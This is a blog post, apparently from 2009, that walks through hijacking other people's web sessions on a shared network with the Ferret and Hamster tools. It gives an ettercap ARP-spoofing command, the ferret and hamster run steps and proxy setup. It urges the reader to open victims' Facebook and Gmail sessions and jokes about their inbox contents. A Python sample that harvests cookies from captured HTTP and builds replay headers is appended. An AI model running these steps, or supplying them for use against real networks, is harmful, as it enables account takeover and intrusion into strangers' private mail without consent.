Tuesday, November 24, 2009

Ferret and Hamster 2.0 (sidejacking)

Ferret and Hamster are two useful utilities for when you are the man in the middle on an Ethernet or wireless network. The idea behind the tools is to sniff cookies and session IDs out of the packets they see and then duplicate that information in your own browser. The end result is that if you have a friend on Facebook and you can obtain his cookies and session IDs, you can get into his Facebook session without needing his username or password. Try logging into Facebook and closing the page without logging out. Reopen the web browser, go back to facebook.com, and you should be logged in without typing your credentials. This happens because your cookies are being used to identify you to Facebook's servers: the cookie is the session, so anyone holding a copy of it is you as far as the server is concerned. Note that this only works against cookies that travel over unencrypted HTTP; a cookie that is only ever sent over HTTPS (or flagged Secure) never appears on the wire for a sniffer to grab. The two utilities complement each other very well: ferret is the sniffer, which captures only cookie and session ID information, and hamster sets up a pretty web interface in which you can select the sessions that ferret sniffed and have them duplicated in your browser. Ferret and Hamster were originally Windows-based utilities but have been ported to Linux as of version 2.0.

Demo:
Download: http://www.erratasec.com/erratasec.zip

Extract the contents and compile the binaries with make.
Once everything is compiled there are three files you need: ferret, hamster and hamster.txt (all three must be in the same folder for it to work).

Execute a man in the middle attack (ARP spoofing with ettercap, so the victim's traffic passes through your machine; on an open wireless network you may not need this step at all, since every client's traffic is already visible to a sniffer):
ettercap -Tq -M arp:remote -i eth0 /router_ip/ /host_ip/
or


run ferret:
./ferret -i eth0

Ferret will start capturing useful information. (Note: you don't have to be sniffing at the moment a user logs into a site. You can capture his cookies while he is already logged in and browsing the website, because the browser resends them with every request.) Ferret dumps information about the sessions and cookies it sees into hamster.txt, which the hamster utility needs.

run hamster:
./hamster

Hamster then runs a local proxy web server on port 1234. To connect to it, change your browser's proxy settings to use 127.0.0.1 and port 1234, then type 'http://hamster' in the address bar. It is best to do this from a browser profile you don't otherwise use, so your own cookies for those sites don't get mixed up with the cloned ones. When the page comes up you may have to refresh a couple of times before hamster sees a host/IP address. Click on a host and you will be presented with information about it, including the websites it is currently on. Don't hesitate to click on www.facebook.com or mail.google.com. Don't be surprised if clicking takes you straight into someone else's inbox, filled with e-mails for subscriptions to penis enlargement products and animal porn. Don't say I didn't warn you.
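To make concrete what ferret pulls off the wire and what hamster replays, here is an added example (not code from the original post, and not Errata Security's own ferret or hamster source): a small Python script that parses constructed plaintext HTTP captures, builds a per-host cookie jar the way a sidejacker would, and produces the Cookie header you would inject to clone the session. The payloads, host names and cookie values are made up for the demonstration; a live version would need pcap or raw sockets in place of the hard-coded list.

```python
"""Offline illustration of the ferret/hamster idea: harvest session cookies
from plaintext HTTP and rebuild the header needed to replay them.

Added example, not code from the original post and not Errata Security's
ferret or hamster source.  Nothing is sniffed live: CAPTURED_PAYLOADS are
constructed TCP payloads standing in for what ferret sees on the wire.
"""
import re

# Constructed captures, in wire order, as a sniffer would see them on an
# unencrypted HTTP flow.  Hosts and cookie values are made up.
CAPTURED_PAYLOADS = [
    b"GET /home.php HTTP/1.1\r\n"
    b"Host: www.facebook.com\r\n"
    b"Cookie: c_user=100001; xs=abc123; datr=tracking\r\n\r\n",
    # Server rotates the session cookie; the browser sends xs=def456 from now on.
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: xs=def456; path=/; HttpOnly\r\n"
    b"Content-Type: text/html\r\n\r\n<html></html>",
    b"GET /mail/ HTTP/1.1\r\n"
    b"Host: mail.google.com\r\n"
    b"Cookie: GX=session-token-xyz; PREF=lang=en\r\n\r\n",
    # A request with no cookies at all: nothing worth recording.
    b"POST /login HTTP/1.1\r\nHost: example.org\r\n\r\nuser=a&pass=b",
]

# Request lines look like "GET /path HTTP/1.1"; response lines start with "HTTP/".
_REQUEST_LINE_RE = re.compile(r"^[A-Z]+ \S+ HTTP/1\.[01]$")


def parse_http_message(payload):
    """Split one plaintext HTTP message into (is_request, header_pairs).

    header_pairs is a list of (lower-cased name, value); the body is ignored
    because everything a sidejacker wants lives in the headers.
    """
    head, _, _body = payload.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    start_line, header_lines = lines[0], lines[1:]
    headers = []
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return _REQUEST_LINE_RE.match(start_line) is not None, headers


def parse_cookie_header(value):
    """'a=1; b=2' -> [('a', '1'), ('b', '2')]; only the first '=' splits."""
    pairs = []
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep and name:
            pairs.append((name, val))
    return pairs


def parse_set_cookie(value):
    """Return (name, value) from a Set-Cookie header.

    Attributes such as HttpOnly are deliberately dropped: HttpOnly only hides
    the cookie from script in the victim's browser and does nothing on the
    wire.  Only TLS keeps the value away from a sniffer.
    """
    first = value.split(";", 1)[0]
    name, _, val = first.strip().partition("=")
    return name, val


def harvest_cookies(payloads):
    """Walk messages in wire order and return {host: {cookie_name: value}}.

    A response is attributed to the host of the most recent request, a
    simplification of following one TCP flow at a time.
    """
    jar = {}
    current_host = None
    for payload in payloads:
        is_request, headers = parse_http_message(payload)
        if is_request:
            current_host = next((v for n, v in headers if n == "host"), None)
            if current_host is None:
                continue
            for name, value in headers:
                if name == "cookie":
                    jar.setdefault(current_host, {}).update(parse_cookie_header(value))
        elif current_host is not None:
            for name, value in headers:
                if name == "set-cookie":
                    cookie, val = parse_set_cookie(value)
                    jar.setdefault(current_host, {})[cookie] = val
    return jar


def replay_cookie_header(jar, host):
    """Build the Cookie header a proxy like hamster would inject for host.

    Returns "" when nothing was captured for that host.
    """
    cookies = jar.get(host)
    if not cookies:
        return ""
    return "Cookie: " + "; ".join(f"{k}={v}" for k, v in cookies.items())


if __name__ == "__main__":
    captured = harvest_cookies(CAPTURED_PAYLOADS)
    for host in captured:
        print(host)
        print("  " + replay_cookie_header(captured, host))
```

The point the sample makes is the same one the post makes in prose: the attacker never needs a password, only the cookie values that the browser repeats on every plaintext request, and the HttpOnly flag on the rotated cookie changes nothing because it was still sent in the clear.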

Here is a quick demo of such an attack that I made.

sidejacking gmail and facebook accounts from aerokid240 on Vimeo.
